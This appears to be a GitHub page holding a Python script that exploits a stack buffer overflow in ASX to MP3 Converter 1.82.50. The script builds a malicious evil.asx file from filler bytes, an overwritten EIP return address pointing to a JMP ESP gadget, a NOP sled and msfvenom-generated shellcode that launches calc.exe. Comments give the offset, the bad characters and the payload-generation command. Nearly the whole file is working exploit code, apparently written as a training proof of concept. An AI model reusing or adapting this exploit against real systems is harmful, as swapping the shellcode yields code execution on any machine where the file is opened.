-
Notifications
You must be signed in to change notification settings - Fork 0
/
asxmp3_calcexploit.py
67 lines (57 loc) · 2.61 KB
/
asxmp3_calcexploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python
# ASX to MP3 Converter 1.82.50 SOF exploit
# Software: https://www.exploit-db.com/apps/b7c8c2a232e1d4a959c43970a877a799-ASXtoMP3Converter.exe
# Date: 02 Oct 2022
# Reference:
# Author: Dylan Jenkins
# Based on PoC by the totally real person: Ivan Ivanovic Ivanov
# Reference: https://www.exploit-db.com/exploits/38382/
# Tested on: Windows 2k3
# EIP Offset: 249
# Bad Chars: x00\x09\x0a\x1a
# Return Address | dll: 0x1003789d ("\xFF\xEF", JMP ESP) | MSA2Multility03.dll
# Usage: Open ASX to MP3 Converter application > load evil asx file > Opens calc.exe
import socket
import time
import sys
filler = "A" * 249
eip = "\x9d\x78\x03\x10"
offset = "C" * 4
nops = "\x90" * 10
# Code used to generate payload:
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f python -v shellcode
shellcode = b""
shellcode += b"\xdb\xda\xb8\x62\xaf\xe9\x67\xd9\x74\x24\xf4"
shellcode += b"\x5d\x33\xc9\xb1\x31\x83\xc5\x04\x31\x45\x14"
shellcode += b"\x03\x45\x76\x4d\x1c\x9b\x9e\x13\xdf\x64\x5e"
shellcode += b"\x74\x69\x81\x6f\xb4\x0d\xc1\xdf\x04\x45\x87"
shellcode += b"\xd3\xef\x0b\x3c\x60\x9d\x83\x33\xc1\x28\xf2"
shellcode += b"\x7a\xd2\x01\xc6\x1d\x50\x58\x1b\xfe\x69\x93"
shellcode += b"\x6e\xff\xae\xce\x83\xad\x67\x84\x36\x42\x0c"
shellcode += b"\xd0\x8a\xe9\x5e\xf4\x8a\x0e\x16\xf7\xbb\x80"
shellcode += b"\x2d\xae\x1b\x22\xe2\xda\x15\x3c\xe7\xe7\xec"
shellcode += b"\xb7\xd3\x9c\xee\x11\x2a\x5c\x5c\x5c\x83\xaf"
shellcode += b"\x9c\x98\x23\x50\xeb\xd0\x50\xed\xec\x26\x2b"
shellcode += b"\x29\x78\xbd\x8b\xba\xda\x19\x2a\x6e\xbc\xea"
shellcode += b"\x20\xdb\xca\xb5\x24\xda\x1f\xce\x50\x57\x9e"
shellcode += b"\x01\xd1\x23\x85\x85\xba\xf0\xa4\x9c\x66\x56"
shellcode += b"\xd8\xff\xc9\x07\x7c\x8b\xe7\x5c\x0d\xd6\x6d"
shellcode += b"\xa2\x83\x6c\xc3\xa4\x9b\x6e\x73\xcd\xaa\xe5"
shellcode += b"\x1c\x8a\x32\x2c\x59\x64\x79\x6d\xcb\xed\x24"
shellcode += b"\xe7\x4e\x70\xd7\xdd\x8c\x8d\x54\xd4\x6c\x6a"
shellcode += b"\x44\x9d\x69\x36\xc2\x4d\x03\x27\xa7\x71\xb0"
shellcode += b"\x48\xe2\x11\x57\xdb\x6e\xf8\xf2\x5b\x14\x04"
# Buffer Sturcture:
# AAAAA.AAAA + EIP + NOP...NOP + shellcode + BBB....BBB
inputBuffer = filler + eip + nops + shellcode
# Create buffer asx file and print to user
print("\n .asx file buffer file creator, run as sudo/admin for file creation rights \n")
print("\nCreating evil asx file buffer to test control of EIP\n")
print("\ninput buffer is:\n")
print(inputBuffer)
print("\ncreatingfile: evil.asx\n")
f = open("evil.asx", "w")
f.write(inputBuffer)
f.close()
print("\nclosing\n")
sys.exit()